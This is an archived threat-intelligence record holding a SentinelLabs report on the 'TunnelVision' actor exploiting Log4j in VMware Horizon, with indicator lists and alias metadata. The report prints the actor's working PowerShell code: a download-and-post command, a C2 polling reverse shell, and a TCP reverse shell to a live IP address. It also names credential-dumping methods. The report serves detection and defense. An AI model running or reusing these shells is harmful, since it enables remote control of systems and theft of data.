{ "id": "846b7701-62ec-4f06-b1dc-13ede4b9d923", "created_at": "2026-04-06T00:15:16.657954Z", "updated_at": "2026-04-10T03:34:00.362193Z", "deleted_at": null, "sha1_hash": "b29d11811c347eb1f16ba0bfaa4043ef63c6aedb", "title": "Log4j2 In The Wild | Iranian-Aligned Threat Actor \"TunnelVision\" Actively Exploiting VMware Horizon", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 66397, "plain_text": "Log4j2 In The Wild | Iranian-Aligned Threat Actor\r\n\"TunnelVision\" Actively Exploiting VMware Horizon\r\nBy Amitai Ben Shushan Ehrlich\r\nPublished: 2022-02-17 · Archived: 2026-04-05 13:19:09 UTC\r\nBy Amitai Ben Shushan Ehrlich and Yair Rigevsky\r\nExecutive Summary\r\nSentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East\r\nand the US.\r\nDue to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely\r\ndeploy those, we track this cluster of activity as TunnelVision.\r\nMuch like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to\r\ndeployment of ransomware, making the group a potentially destructive actor.\r\nOverview\r\nTunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During\r\nthe time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-\r\n13379), Microsoft Exchange (ProxyShell) and recently Log4Shell. In almost all of those cases, the threat actor\r\ndeployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the\r\ngroup are Fast Reverse Proxy Client (FRPC) and Plink.\r\nTunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in\r\nthe Attribution section.\r\nIn this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing\r\naround exploitation of VMware Horizon Log4j vulnerabilities.\r\nVMware Horizon Exploitation\r\nThe exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat\r\nservice of the VMware product ( C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_TomcatService.exe ).\r\nTunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands,\r\ndeploy backdoors, create backdoor users, harvest credentials and perform lateral movement.\r\nTypically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then\r\nruns further commands by means of PS reverse shells, executed via the Tomcat process.\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 1 of 5\n\nPowerShell Commands\r\nTunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands,\r\nsending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a\r\ncompromised VMware Horizon server:\r\ntry{\r\n (New-Object System.Net.WebClient).DownloadFile(\"hxxp://transfer.sh/uSeOFn/ngrok.exe\",\"C:\\\\Users\\P\r\n Rename-Item 'c://Users//public//new.txt' 'microsoft.exe';\r\n $a=iex 'dir \"c://Users//public//\"' | Out-String;\r\n iwr -method post -body $a https:\r\n}catch{\r\n iwr -method post -body $Error[0] https:\r\n}\r\nThroughout the activity the usage of multiple legitimate services was observed. Given an environment is\r\ncompromised by TunnelVision, it might be helpful to look for outbound connections to any of those legitimate\r\npublic services:\r\ntransfer.sh\r\npastebin.com\r\nwebhook.site\r\nufile.io\r\nraw.githubusercontent.com\r\nReverse Shell #1\r\n$c = \"\"\r\n$p = \"\"\r\n$r = \"\"\r\n$u = \"hxxps://www.microsoft-updateserver.cf/gadfTs55sghsSSS\"\r\n$wc = New-Object System.Net.WebClient\r\n$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];\r\n$c = \"whoami\"\r\n$c = 'Write-Host \" \";'+$c\r\n$r = \u0026(gcm *ke-e*) $c | Out-String \u003e \"c:\\programdata\\$env:COMPUTERNAME-$li\"\r\n$ur = $wc.UploadFile(\"$u/phppost.php\" , \"c:\\programdata\\$env:COMPUTERNAME-$li\")\r\nwhile($true)\r\n{\r\n $c = $wc.DownloadString(\"$u/$env:COMPUTERNAME-$li/123.txt\")\r\n $c = 'Write-Host \" \";'+$c\r\n if($c -ne $p)\r\n {\r\n $r = \u0026(gcm *ke-e*) $c | Out-String \u003e \"c:\\programdata\\$env:COMPUTERNAME-$li\"\r\n $p = $c\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 2 of 5\n\n$ur = $wc.UploadFile(\"$u/phppost.php\" , \"c:\\programdata\\$env:COMPUTERNAME-$li\")\r\n }\r\n sleep 3\r\n}\r\nReverse Shell #1 was used in the past by TunnelVision operators\r\n(7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS”. This C2 was referenced in several articles analyzing TunnelVision activities.\r\nThroughout the activity the threat actor leveraged another domain, service-management[.]tk , used to host\r\nmalicious payloads. According to VirusTotal, this domain was also used to host a zip file\r\n(d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor\r\n(624278ed3019a42131a3a3f6e0e2aac8d8c8b438).\r\nThe backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to\r\n%ProgramData%\\Installed Packages\\InteropServices.exe and registers it as a service named “InteropServices”.\r\nThe dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the\r\nsame C2 server ( www[.]microsoft-updateserver[.]cf ). Although it is not encrypted, it is deobfuscated and\r\nexecuted in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its\r\nPowerShell payload.\r\nReverse Shell #2\r\n$hst = \"51.89.135.142\";\r\n$prt = 443;\r\nfunction watcher() {;\r\n $limit = (Get - Random - Minimum 3 - Maximum 7);\r\n $stopWatch = New - Object - TypeName System.Diagnostics.Stopwatch;\r\n $timeSpan = New - TimeSpan - Seconds $limit;\r\n $stopWatch.Start();\r\n while ((($stopWatch.Elapsed).TotalSeconds - lt $timeSpan.TotalSeconds) ) {};\r\n $stopWatch.Stop();\r\n};\r\nwatcher;\r\n$arr = New - Object int[] 500;\r\nfor ($i = 0;\r\n$i - lt 99;\r\n$i++) {;\r\n $arr[$i] = (Get - Random - Minimum 1 - Maximum 25);\r\n};\r\nif ($arr[0] - gt 0) {;\r\n $valksdhfg = New - Object System.Net.Sockets.TCPClient($hst, $prt);\r\n $banljsdfn = $valksdhfg.GetStream();\r\n [byte[]]$bytes = 0..65535|% {\r\n 0\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 3 of 5\n\n};\r\n while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length)) - ne 0) {;\r\n $lkjnsdffaa = (New - Object - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\r\n $nsdfgsahjxx = (\u0026(gcm('*ke-exp*')) $lkjnsdffaa 2 \u003e \u00261 | Out - String );\r\n $nsdfgsahjxx2 = $nsdfgsahjxx + (pwd).Path + \"\u003e \";\r\n $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2);\r\n $banljsdfn.Write($sendbyte, 0, $sendbyte.Length);\r\n $banljsdfn.Flush();\r\n watcher\r\n };\r\n $valksdhfg.Close();\r\n};\r\nMost of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a\r\nmodified variant of a publicly available PowerShell one-liner.\r\nAmong those activities were:\r\nExecution of recon commands.\r\nCreation of a backdoor user and adding it to the administrators group.\r\nCredential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.\r\nDownload and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.\r\nExecution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].\r\nInternal subnet RDP scan using a publicly available port scan script.\r\nThroughout the activity, the threat actor utilized a github repository “VmWareHorizon” of an account owned by\r\nthe threat actor, using the name “protections20”.\r\nAttribution\r\nTunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names,\r\nsuch as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).\r\nThis confusion arises since activity that Microsoft recognizes as a single group, “Phosphorous”, overlaps with\r\nactivity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.\r\nWe track this cluster separately under the name “TunnelVision”. This does not imply we believe they are\r\nnecessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the\r\naforementioned attributions.\r\nIndicators of Compromise\r\nTYPE INDICATOR NOTES\r\nDomain\r\nwww[.]microsoft-updateserver[.]cf\r\nCommand and Control (C2) Server\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 4 of 5\n\nDomain www[.]service-management[.]tk Payload server\r\nIP 51.89.169[.]198 Command and Control (C2) Server\r\nIP 142.44.251[.]77 Command and Control (C2) Server\r\nIP 51.89.135[.]142 Command and Control (C2) Server\r\nIP 51.89.190[.]128 Command and Control (C2) Server\r\nIP 51.89.178[.]210\r\nCommand and Control (C2) Server, Tunneling\r\nServer\r\nIP 142.44.135[.]86 Tunneling Server\r\nIP 182.54.217[.]2 Payload Server\r\nGithub\r\nAccount\r\nhttps://github.com/protections20 Account utilized to host payloads\r\nSource: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nhttps://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MISPGALAXY" ], "references": [ "https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/" ], "report_names": [ "log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48", "created_at": "2022-10-25T16:07:23.84296Z", "updated_at": "2026-04-10T02:00:04.762229Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "DEV-0270", "DireFate", "Lord Nemesis", "Nemesis Kitten", "Yellow Dev 23", "Yellow Dev 24" ], "source_name": "ETDA:DEV-0270", "tools": [ "Impacket", "LOLBAS", "LOLBins", "Living off the Land", "WmiExec" ], "source_id": "ETDA", "reports": null }, { "id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0", "created_at": "2023-03-04T02:01:54.110909Z", "updated_at": "2026-04-10T02:00:03.359871Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "Nemesis Kitten", "Storm-0270" ], "source_name": "MISPGALAXY:DEV-0270", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434516, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.pdf", "text": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.txt", "img": "https://archive.orkl.eu/b29d11811c347eb1f16ba0bfaa4043ef63c6aedb.jpg" } }